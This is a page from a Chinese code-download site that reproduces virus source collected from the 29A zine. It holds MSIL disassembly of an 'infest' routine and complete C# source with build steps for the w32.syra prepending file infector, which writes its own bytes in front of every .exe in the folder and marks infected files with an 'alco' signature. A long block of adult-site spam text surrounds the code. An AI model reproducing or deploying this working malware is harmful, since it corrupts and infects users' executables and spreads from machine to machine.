亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 29a-7.019

?? 從29A上收集的病毒源碼
?? 019
?? 第 1 頁 / 共 3 頁
字號:
    IL_019c:  ret // end virus
  }

  .method public hidebysig static void  infest(string host) cil managed
  {
    // Code size       300 (0x12c)
    .maxstack  4
    .locals (class [mscorlib]System.Reflection.Module V_0,
             class [mscorlib]System.IO.FileStream V_1,
             class [mscorlib]System.IO.BinaryReader V_2,
             unsigned int8[] V_3,
             int32 V_4,
             int32 V_5,
             int32 V_6,
             class [mscorlib]System.IO.FileStream V_7,
             class [mscorlib]System.IO.BinaryReader V_8,
             unsigned int8[] V_9,
             int32 V_10,
             int32 V_11,
             int32 V_12,
             class [mscorlib]System.IO.FileStream V_13,
             class [mscorlib]System.IO.BinaryWriter V_14)
    IL_0000:  call       class [mscorlib]System.Reflection.Assembly [mscorlib]System.Reflection.Assembly::GetExecutingAssembly()
    IL_0005:  callvirt   instance class [mscorlib]System.Reflection.Module[] [mscorlib]System.Reflection.Assembly::GetModules()
    IL_000a:  ldc.i4.0
    IL_000b:  ldelem.ref // reflection
    IL_000c:  stloc.0
    IL_000d:  ldloc.0
    IL_000e:  callvirt   instance string [mscorlib]System.Reflection.Module::get_FullyQualifiedName() // app.path & "\" & app.exename & ".exe"
    IL_0013:  ldc.i4.4   // open or create
    IL_0014:  ldc.i4.1   // read
    IL_0015:  newobj     instance void [mscorlib]System.IO.FileStream::.ctor(string,
                                                                             valuetype [mscorlib]System.IO.FileMode,
                                                                             valuetype [mscorlib]System.IO.FileAccess) // new object
    IL_001a:  stloc.1
    IL_001b:  ldloc.1
    IL_001c:  newobj     instance void [mscorlib]System.IO.BinaryReader::.ctor(class [mscorlib]System.IO.Stream) // new object
    IL_0021:  stloc.2
    IL_0022:  ldloc.2
    IL_0023:  callvirt   instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryReader::get_BaseStream()
    IL_0028:  ldc.i4.0 // origin
    IL_0029:  conv.i8  // convert to int64
    IL_002a:  ldc.i4.0 // origin
    IL_002b:  callvirt   instance int64 [mscorlib]System.IO.Stream::Seek(int64,
                                                                         valuetype [mscorlib]System.IO.SeekOrigin)
    IL_0030:  pop
    IL_0031:  ldc.i4     0xE00 // virus
    IL_0036:  newarr     [mscorlib]System.Byte
    IL_003b:  stloc.3
    IL_003c:  ldc.i4     0xE00
    IL_0041:  stloc.s    V_4
    IL_0043:  ldc.i4.0
    IL_0044:  stloc.s    V_5
    IL_0046:  br.s       IL_0069

    IL_0048:  ldloc.2
    IL_0049:  ldloc.3
    IL_004a:  ldloc.s    V_5
    IL_004c:  ldloc.s    V_4
    IL_004e:  callvirt   instance int32 [mscorlib]System.IO.BinaryReader::Read(unsigned int8[],
                                                                               int32,
                                                                               int32) // read itself
    IL_0053:  stloc.s    V_6
    IL_0055:  ldloc.s    V_6
    IL_0057:  brtrue.s   IL_005b

    IL_0059:  br.s       IL_006e

    IL_005b:  ldloc.s    V_5
    IL_005d:  ldloc.s    V_6
    IL_005f:  add
    IL_0060:  stloc.s    V_5
    IL_0062:  ldloc.s    V_4
    IL_0064:  ldloc.s    V_6
    IL_0066:  sub
    IL_0067:  stloc.s    V_4
    IL_0069:  ldloc.s    V_4
    IL_006b:  ldc.i4.0
    IL_006c:  bgt.s      IL_0048

    IL_006e:  ldloc.2
    IL_006f:  callvirt   instance void [mscorlib]System.IO.BinaryReader::Close() // close itself
    IL_0074:  ldarg.0 // victim
    IL_0075:  ldc.i4.4    // open or create
    IL_0076:  ldc.i4.1  // read
    IL_0077:  newobj     instance void [mscorlib]System.IO.FileStream::.ctor(string,
                                                                             valuetype [mscorlib]System.IO.FileMode,
                                                                             valuetype [mscorlib]System.IO.FileAccess)
    IL_007c:  stloc.s    V_7
    IL_007e:  ldloc.s    V_7 // object FileStream
    IL_0080:  newobj     instance void [mscorlib]System.IO.BinaryReader::.ctor(class [mscorlib]System.IO.Stream)
    IL_0085:  stloc.s    V_8
    IL_0087:  ldloc.s    V_8  // object BinaryReader 
    IL_0089:  callvirt   instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryReader::get_BaseStream()
    IL_008e:  ldc.i4.0   // beginning
    IL_008f:  conv.i8    // convert to int 64
    IL_0090:  ldc.i4.0   // beginning 0
    IL_0091:  callvirt   instance int64 [mscorlib]System.IO.Stream::Seek(int64,
                                                                         valuetype [mscorlib]System.IO.SeekOrigin)
    IL_0096:  pop
    IL_0097:  ldloc.s    V_7 // FileStream
    IL_0099:  callvirt   instance int64 [mscorlib]System.IO.Stream::get_Length() // FileStream.Length of victim
    IL_009e:  conv.ovf.u4
    IL_009f:  newarr     [mscorlib]System.Byte
    IL_00a4:  stloc.s    V_9
    IL_00a6:  ldloc.s    V_7
    IL_00a8:  callvirt   instance int64 [mscorlib]System.IO.Stream::get_Length()
    IL_00ad:  conv.i4
    IL_00ae:  stloc.s    V_10
    IL_00b0:  ldc.i4.0
    IL_00b1:  stloc.s    V_11
    IL_00b3:  br.s       IL_00d8

    IL_00b5:  ldloc.s    V_8
    IL_00b7:  ldloc.s    V_9
    IL_00b9:  ldloc.s    V_11
    IL_00bb:  ldloc.s    V_10
    IL_00bd:  callvirt   instance int32 [mscorlib]System.IO.BinaryReader::Read(unsigned int8[],
                                                                               int32,
                                                                               int32) // read victim bytes
    IL_00c2:  stloc.s    V_12
    IL_00c4:  ldloc.s    V_12
    IL_00c6:  brtrue.s   IL_00ca

    IL_00c8:  br.s       IL_00dd

    IL_00ca:  ldloc.s    V_11
    IL_00cc:  ldloc.s    V_12
    IL_00ce:  add
    IL_00cf:  stloc.s    V_11
    IL_00d1:  ldloc.s    V_10
    IL_00d3:  ldloc.s    V_12
    IL_00d5:  sub
    IL_00d6:  stloc.s    V_10
    IL_00d8:  ldloc.s    V_10
    IL_00da:  ldc.i4.0
    IL_00db:  bgt.s      IL_00b5

    IL_00dd:  ldloc.s    V_8
    IL_00df:  callvirt   instance void [mscorlib]System.IO.BinaryReader::Close() // close
    IL_00e4:  ldarg.0    // victim
    IL_00e5:  ldc.i4.4   // open or create
    IL_00e6:  ldc.i4.2   // write
    IL_00e7:  newobj     instance void [mscorlib]System.IO.FileStream::.ctor(string,
                                                                             valuetype [mscorlib]System.IO.FileMode,
                                                                             valuetype [mscorlib]System.IO.FileAccess)
    IL_00ec:  stloc.s    V_13
    IL_00ee:  ldloc.s    V_13 // load filestream object
    IL_00f0:  newobj     instance void [mscorlib]System.IO.BinaryWriter::.ctor(class [mscorlib]System.IO.Stream)
    IL_00f5:  stloc.s    V_14
    IL_00f7:  ldloc.s    V_14  // load binarywriter object
    IL_00f9:  callvirt   instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryWriter::get_BaseStream()
    IL_00fe:  ldc.i4.0   // beginning
    IL_00ff:  conv.i8    // convert to int64
    IL_0100:  ldc.i4.0   // 0, beginning
    IL_0101:  callvirt   instance int64 [mscorlib]System.IO.Stream::Seek(int64,
                                                                         valuetype [mscorlib]System.IO.SeekOrigin)
    IL_0106:  pop
    IL_0107:  ldloc.s    V_14  // object binarywriter
    IL_0109:  ldloc.3    // virusbytes
    IL_010a:  callvirt   instance void [mscorlib]System.IO.BinaryWriter::Write(unsigned int8[]) // write
    IL_010f:  ldloc.s    V_14  // object binarywriter
    IL_0111:  ldloc.s    V_9  // hostbytes
    IL_0113:  callvirt   instance void [mscorlib]System.IO.BinaryWriter::Write(unsigned int8[]) // write
    IL_0118:  ldloc.s    V_14  // object binarywriter
    IL_011a:  ldstr      "paul" // signature
    IL_011f:  callvirt   instance void [mscorlib]System.IO.BinaryWriter::Write(string) // write
    IL_0124:  ldloc.s    V_14 // object binarywriter
    IL_0126:  callvirt   instance void [mscorlib]System.IO.BinaryWriter::Close() // close
    IL_012b:  ret // end infest
  }

  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    // Code size       7 (0x7)
    .maxstack  8
    IL_0000:  ldarg.0
    IL_0001:  call       instance void [mscorlib]System.Object::.ctor()
    IL_0006:  ret
  }

}
//////////////////////////////////////////////////////////////////////////////////////////////////[3589.TXT]//////////////////
////////////////////////////////////// illawesome experiments : branch of the booze zen productions //////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////// philippines 3300 //////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////////////////[syra.cs]///////////////////////
// w32.syra (aka w32.hllp.flatei)											//////
//															//////
// i did it after reading benny's frustration in 29a6 of writing a c# virus...  - alcopaul                              //////
//															//////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// csc /target:winexe syra.cs           ////
// copy con alco.sig                    ////
// alco^Z                               ////
// copy /b syra.exe+alco.sig vir.exe    ////
// copy vir.exe syra.exe                ////
// y				        ////
////////////////////////////////////////////
// "flatei, not sharpei..."      ///////////
////////////////////////////////////////////

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;

class msil_syra_by_alcopaul
{
   public class Win32 {
   [DllImport("shell32.dll", CharSet=CharSet.Auto)]
   public static extern int ShellExecute(int hWnd, String oper, String file, String param, 
                     String dir, int type);
   [DllImport("user32.dll", CharSet=CharSet.Auto)]
   public static extern int MessageBox(int hWnd, String text, 
                     String caption, uint type);
   }
  public static void Main(String[] args)
   {
   Module exename = Assembly.GetExecutingAssembly().GetModules()[0];
   string[] files = Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe");
   foreach (string file in files){
   FileStream fs = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read);
   StreamReader r = new StreamReader(fs);
   int fff = (int) fs.Length;
   int rrr = fff - 4;
   r.BaseStream.Seek(rrr, SeekOrigin.Begin);
   string g = r.ReadLine();
   r.Close();
   string hhh = "alco";
   if (g==hhh)
   continue;
   else
   if (file==exename.FullyQualifiedName)
   continue;
   else
   try
      {  
      Infect(file);
      }
   catch
      {
      continue;
      }
   break;
   }
   FileStream fs1 = new FileStream(exename.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
   BinaryReader r1 = new BinaryReader(fs1);
   int host = (int) fs1.Length;
   int vir = host - 5124;
   r1.BaseStream.Seek(5124, SeekOrigin.Begin);
   byte[] bytes = new byte[vir];
   int numBytesToRead = vir;
   int numBytesRead = 0;
   while (numBytesToRead > 0)
   {
   int n = r1.Read(bytes, numBytesRead, numBytesToRead);
   if (n==0)
   break;
   numBytesRead += n;
   numBytesToRead -= n;
   }
   r1.Close();
   FileStream fs11 = new FileStream("hostbyte.exe", FileMode.OpenOrCreate, FileAccess.Write);
   BinaryWriter w1 = new BinaryWriter(fs11);         
   w1.BaseStream.Seek(0, SeekOrigin.Begin);
   w1.Write(bytes);
   w1.Close();
   string rect = Directory.GetCurrentDirectory();
   Win32.ShellExecute(0, null, "hostbyte.exe", null, rect, 1);
   wet:
      try
      {
      File.Delete("hostbyte.exe");
      }
      catch
      {
      goto wet;
      }
      if (File.Exists("hostbyte.exe")==true)
      goto wet;
   Win32.MessageBox(0, "::: prepending virus purely written in d flat :::", "msil.syra by alcopaul",
                   0);
}
   public static void Infect(string host)
   { 
     Module mod = Assembly.GetExecutingAssembly().GetModules()[0];
     FileStream fs = new FileStream(mod.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
     BinaryReader r = new BinaryReader(fs);        
     r.BaseStream.Seek(0, SeekOrigin.Begin);
     byte[] bytes = new byte[5124];
     int numBytesToRead = (int) 5124;
     int numBytesRead = 0;
     while (numBytesToRead > 0)
     {
     int n = r.Read(bytes, numBytesRead, numBytesToRead);
     if (n==0)
     break;
     numBytesRead += n;
     numBytesToRead -= n;
    }
     r.Close();
     FileStream fs133 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
     BinaryReader w33 = new BinaryReader(fs133);
     w33.BaseStream.Seek(0, SeekOrigin.Begin);
     byte[] bytes2 = new byte[fs133.Length];
     int numBytesToRead2 = (int) fs133.Length;
     int numBytesRead2 = 0;
     while (numBytesToRead2 > 0)
     {
     int n = w33.Read(bytes2, numBytesRead2, numBytesToRead2);
     if (n==0)
     break;
     numBytesRead2 += n;
     numBytesToRead2 -= n;
     }
     w33.Close();
     FileStream fs1 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write);
     BinaryWriter w = new BinaryWriter(fs1);         
     w.BaseStream.Seek(0, SeekOrigin.Begin);
     w.Write(bytes);
     w.Write(bytes2);
     w.Write("alco");
     w.Close();
  }
}

//////////////////////////////////////////////////////////////////////////////////////////////[syra.b.cs]///////////////////
//////////////////////
// w32.syra.b ///////
////////////////////

// sept. 22, 2002 - now syra only infects dotnet exe files, in current directory and in (1 second / 1 Hertz) fashion...
//
// csc /target:winexe syra.b.cs (no more copy con shitz unlike in the first version..)
//
// alcopaul
// brigada ocho & rrlf
//
//

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
日本伊人色综合网| 亚洲精品国产品国语在线app| 美女视频黄 久久| 日韩一级高清毛片| 国产成人小视频| 亚洲天堂福利av| 欧美日韩在线播放三区四区| 天天亚洲美女在线视频| 日韩亚洲欧美在线观看| 国产一区二区在线看| 国产精品热久久久久夜色精品三区| 99精品久久只有精品| 亚洲国产aⅴ天堂久久| 欧美成人a在线| 成人18视频日本| 亚洲bt欧美bt精品| 国产亚洲精品久| 日本韩国精品在线| 久久精品国产99| 亚洲天堂a在线| 欧美一区二区视频在线观看2022| 国产aⅴ精品一区二区三区色成熟| 亚洲视频中文字幕| 日韩一卡二卡三卡| 91玉足脚交白嫩脚丫在线播放| 视频一区二区三区在线| 国产欧美日韩在线| 91精品国产91热久久久做人人| 国产精品一二三在| 石原莉奈在线亚洲二区| 不卡的av电影| 欧美日韩免费一区二区三区视频| 日韩电影网1区2区| 国产亚洲欧美日韩在线一区| 欧美亚洲丝袜传媒另类| 精品一区二区三区在线播放| 亚洲婷婷综合色高清在线| 日韩一区二区影院| 在线视频欧美区| 国产成人综合精品三级| 日韩电影在线免费| 亚洲三级理论片| 久久久久综合网| 91精品国产综合久久久久久| 99精品国产视频| 精品一区二区三区视频| 亚洲va欧美va人人爽| 中文字幕不卡在线播放| 日韩欧美国产综合| 欧美图区在线视频| 91免费看片在线观看| 国产精品一区二区在线播放| 日韩二区三区四区| 欧美艳星brazzers| 欧美精选一区二区| av福利精品导航| 久久不见久久见免费视频1| 亚洲精品久久久久久国产精华液| 久久精品水蜜桃av综合天堂| 日韩免费成人网| 欧美日韩国产精品成人| 日本精品裸体写真集在线观看| 成人av在线播放网站| 国产一区二区免费看| 日韩 欧美一区二区三区| 一区二区三区欧美日| 亚洲三级在线看| 亚洲另类在线视频| 最新久久zyz资源站| 国产亚洲女人久久久久毛片| 精品第一国产综合精品aⅴ| 欧美一卡在线观看| 欧美一区二区视频在线观看2020 | 91在线你懂得| 国产福利精品一区二区| 国产91在线看| 国产电影一区二区三区| 国产成人一级电影| av影院午夜一区| 91小视频免费看| 色综合天天狠狠| 在线观看日韩电影| 在线观看www91| 欧美高清视频一二三区| 欧美挠脚心视频网站| 91麻豆精品国产自产在线| 91精品久久久久久久久99蜜臂| 91精品欧美一区二区三区综合在| 欧美一级在线视频| 精品国产乱码久久久久久闺蜜| 久久伊99综合婷婷久久伊| 久久精品欧美一区二区三区不卡 | 亚洲激情图片一区| 亚洲综合激情另类小说区| 亚洲福中文字幕伊人影院| 亚洲成a人片在线不卡一二三区| 亚洲成人tv网| 久久精品99久久久| 不卡av在线网| 欧美性猛交xxxxxxxx| 这里只有精品免费| 国产欧美一区视频| 亚洲精品老司机| 麻豆极品一区二区三区| 成人免费视频app| 欧美曰成人黄网| 精品乱人伦小说| 亚洲人成小说网站色在线| 亚洲观看高清完整版在线观看| 麻豆久久久久久| av中文字幕一区| 欧美浪妇xxxx高跟鞋交| 国产亚洲精品精华液| 亚洲国产毛片aaaaa无费看| 麻豆极品一区二区三区| av男人天堂一区| 日韩一区二区在线观看视频 | 99久久国产综合精品女不卡| 日韩欧美一级片| 久久久精品国产99久久精品芒果| 日本一区二区动态图| 亚洲国产一区视频| 国产在线一区观看| 在线中文字幕一区| 久久久99精品久久| 亚洲高清中文字幕| 国产成人在线视频网址| 欧美日韩一区二区三区在线看| 久久久精品免费免费| 天天影视涩香欲综合网| av爱爱亚洲一区| 日韩久久久久久| 亚洲一区二区三区四区的| 国产福利一区在线| 日韩三级视频在线观看| 亚洲精品成a人| 国产激情视频一区二区三区欧美| 91麻豆精品国产91久久久久久久久 | 一区二区在线看| 国产美女精品一区二区三区| 欧美午夜精品电影| 欧美主播一区二区三区美女| 91精品国模一区二区三区| 亚洲欧美电影一区二区| 国产麻豆精品在线| 日韩欧美精品在线| 丝袜脚交一区二区| 欧美亚洲禁片免费| 亚洲精品国产一区二区精华液 | 最新中文字幕一区二区三区| 国产一区二区在线免费观看| 日韩精品自拍偷拍| 青青草成人在线观看| 欧美日精品一区视频| 亚洲一级片在线观看| 91视频.com| 中文av一区二区| 国产超碰在线一区| 久久精品欧美日韩| 国产91精品欧美| 国产午夜精品久久久久久久 | 91精品婷婷国产综合久久性色| 一区二区三区四区在线| 色综合欧美在线视频区| 亚洲欧美另类综合偷拍| www.在线成人| 亚洲色图19p| 在线亚洲一区二区| 亚洲综合无码一区二区| 在线视频欧美精品| 亚洲国产欧美一区二区三区丁香婷| 日本高清成人免费播放| 亚洲超丰满肉感bbw| 在线91免费看| 免费观看30秒视频久久| 欧美v亚洲v综合ⅴ国产v| 久久丁香综合五月国产三级网站| 精品国产麻豆免费人成网站| 精品中文字幕一区二区| 国产午夜精品福利| 9色porny自拍视频一区二区| 亚洲免费观看在线观看| 欧美色图天堂网| 免费在线观看一区| 欧美精品一区二区三区四区| 国产精品亚洲成人| 国产精品久久久久久久久久久免费看 | 欧美日韩不卡一区| 奇米精品一区二区三区在线观看| 欧美电影免费观看高清完整版在 | 91.xcao| 亚洲国产视频网站| 精品1区2区3区| 肉色丝袜一区二区| 欧美mv和日韩mv的网站| 国产一区不卡视频| 中文字幕中文乱码欧美一区二区| 91视频在线观看| 日本不卡在线视频| 久久一夜天堂av一区二区三区|